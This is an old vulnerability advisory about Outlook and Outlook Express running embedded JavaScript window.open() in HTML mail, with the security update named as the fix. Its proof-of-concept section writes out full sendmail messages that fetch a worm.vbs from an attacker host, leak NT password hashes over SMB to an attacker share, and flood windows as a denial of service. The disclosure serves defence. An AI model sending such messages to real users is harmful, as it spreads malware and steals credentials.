Microsoft Outlook Malicious URL Vulnerability

[cassius () HUSHMAIL COM (cassius () HUSHMAIL COM)]

[ Microsoft Outlook Malicious URL Vulnerability ]
[ cassius () hushmail com ]

[ Description ]
Outlook HTML messages with embedded JavaScript window.open() calls can
automatically open malicious URLs.  An attacker could use this vulnerability
to
make it appear that the user has received an attachment that has passed
all SMTP
scanners.  The risk here is high, as this vulnerability could allow another
'ILoveYou' type virus to propagate with minimal resistance.

This vulnerability also opens Outlook and possibly other HTML/JavaScript
enabled E-mail clients to a variety of other malicious URL attacks.  Examples
of
possible attacks seem to be endless.  We have been able to send messages
that,
when opened, automatically send a NT users password hash to a box running
L0phtCrack ( http://www.l0pht.com ) in SMB packet capture mode.  This is
a
variation on a known attack that relies on social engineering to get the
victim
to click on a link within the message.

We have tested the following exploits against Outlook 2000 and Outlook Express.
Suppose all versions that allow HTML messages with embedded JavaScript are
vulnerable.  Outlook 2000 is not vulnerable when the message is viewed in
the
preview pane or if the Outlook Security Update has been installed.

The solution for Outlook 98/2000 users is to install the Outlook E-mail
Security Update.
Outlook Express users should upgrade to Outlook 2000 or some other mail
client.

[ Proof of Concept ]
The following examples use Sendmail to craft the messages.  Outlook does
not
normally give you enough control of HTML message source to send these messages.

Example 1 - Sending Fake Attachments
        
        % sendmail victim () example com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: I love you not.
        
        <html><script language="JavaScript"><!--
        window.open('http://evilcomputer.example.com/worm.vbs&apos;);
        --></script>I have attached a file for you.</html>
        
        .

When the victim opens the message an IE dialog box is displayed that prompts
the
user to open the file or download it.  An unsuspecting user could be tricked
into thinking that this 'attachment' has passed all SMTP security scans.

Example 2 - Requesting NT Password Hashes

Set up L0phtCrack to sniff SMB packets on evilcomputer.  Then send the following
message.
                
        % sendmail victim () example com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: Give me your hash.
        
        <html><script language="JavaScript"><!--
        window.open('file:////evilcomputer/sharename/thankyou.html');
        --></script>Blah blah blah.</html>
        
        .

Example 3 - Annoying DoS Attack

        % sendmail victim () example com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: b00m!
        
        <html><script language="JavaScript"><!--
        for (loop=0; loop < 1000; loop++) { window.open('about:<b><h1>Die!'); }
        --></script></html>
        
        .

[ Disclaimer ]
The information contained in this advisory is believed to be accurate at
the
time of printing, but no representation or warranty is given, express or
implied, as to its accuracy or completeness.  Neither the author nor the
publisher accepts any liability whatsoever for any direct, indirect or
consequential loss or damage arising in any way from any use of, or reliance
placed on, this information for any purpose.

IMPORTANT NOTICE:  If you are not using HushMail, this message could have been read easily by the many people who have 
access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.